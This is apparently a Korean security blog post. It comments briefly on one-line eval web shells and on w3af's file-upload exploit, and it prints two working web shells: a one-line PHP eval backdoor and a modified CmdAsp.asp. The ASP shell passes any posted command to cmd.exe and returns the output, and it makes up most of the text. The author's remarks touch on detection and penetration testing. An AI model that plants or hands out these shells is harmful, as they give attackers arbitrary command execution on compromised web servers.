applicationlayer

<?eval($_REQUEST[c])?> 

최근에 발견하는 웹쉘은 거의 다 한줄짜리고 사용하는 함수는 eval뿐이다. 한동안 웹쉘이 종합선물세트마냥 많은 기능을 포함했다면 요즘엔 그런 기능들을 클라이언트에서 처리하는듯하다.
장단점이 있을거다 전자는 ids에서 탐지하기 어렵고 후자는 서버진단시에 발견하기 어렵다
당장에 eval함수를 제한하면 이런 방식의 웹쉘에서 안전할 수 있다. 그런데 eval을 대신할 수 있는 함수는 많다. 

w3af로 파일업로드 익스플로잇을 실행시키려니 계속 먹히지가 않아서 w3af에서 사용하는 웹쉘을 약간 수정하였다.
asp환경인데 aspx용 코드도 있고해서 손을 좀 보았는데 내가 개발을 해본적이 있어야지-_- 그냥저냥 돌아가니 됐지 머;;;
이번이슈를 떠나서 w3af 진심 구리다 -_- 버려버려

<HTML>
<link rel="stylesheet" type="text/css" href="style.css">

<BODY topmargin="2" leftmargin="2">
<PRE>                                                        
<%
  ' --------------------o0o--------------------
  ' File: CmdAsp.asp
  ' Author: Maceo <maceo @ dogmile.com> (some changes made by Dinis Cruz (dinis@ddplus.net))
  ' Release: 2000-12-01
  ' OS: Windows 2000, 4.0 NT
  ' -------------------------------------------

  'Dim oScript
  'Dim oScriptNet
  'Dim oFileSys, oFile
  Dim szCMD, szTempFile

'  On Error Resume Next

  ' -- create the COM objects that we will be using -- '
  Set oScript = Server.CreateObject("WSCRIPT.SHELL")
  Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

  ' -- check for a command that we have posted -- '
  szCMD = Request("CMD")
  If (szCMD = "") Then
    Response.Write("15825b40c6dace2a" & "7cf5d4ab8ed434d5")
  Else
    ' -- Use a poor man's pipe ... a temp file -- '
    szTempFile = Request.ServerVariables("APPL_PHYSICAL_PATH") & oFileSys.GetTempName( )
    Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
'    response.write(szTempFile)
'    response.end
Set    oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)

    ' -- Read the output from our command and remove the temp file -- '
'    On Error Resume Next
    Response.Write (replace(Server.HTMLEncode(oFile.ReadAll),vbnewline+vbnewline,vbnewline))
    oFile.Close
    Call oFileSys.DeleteFile(szTempFile, True)
  End If
%>
</PRE>
</BODY>
</HTML>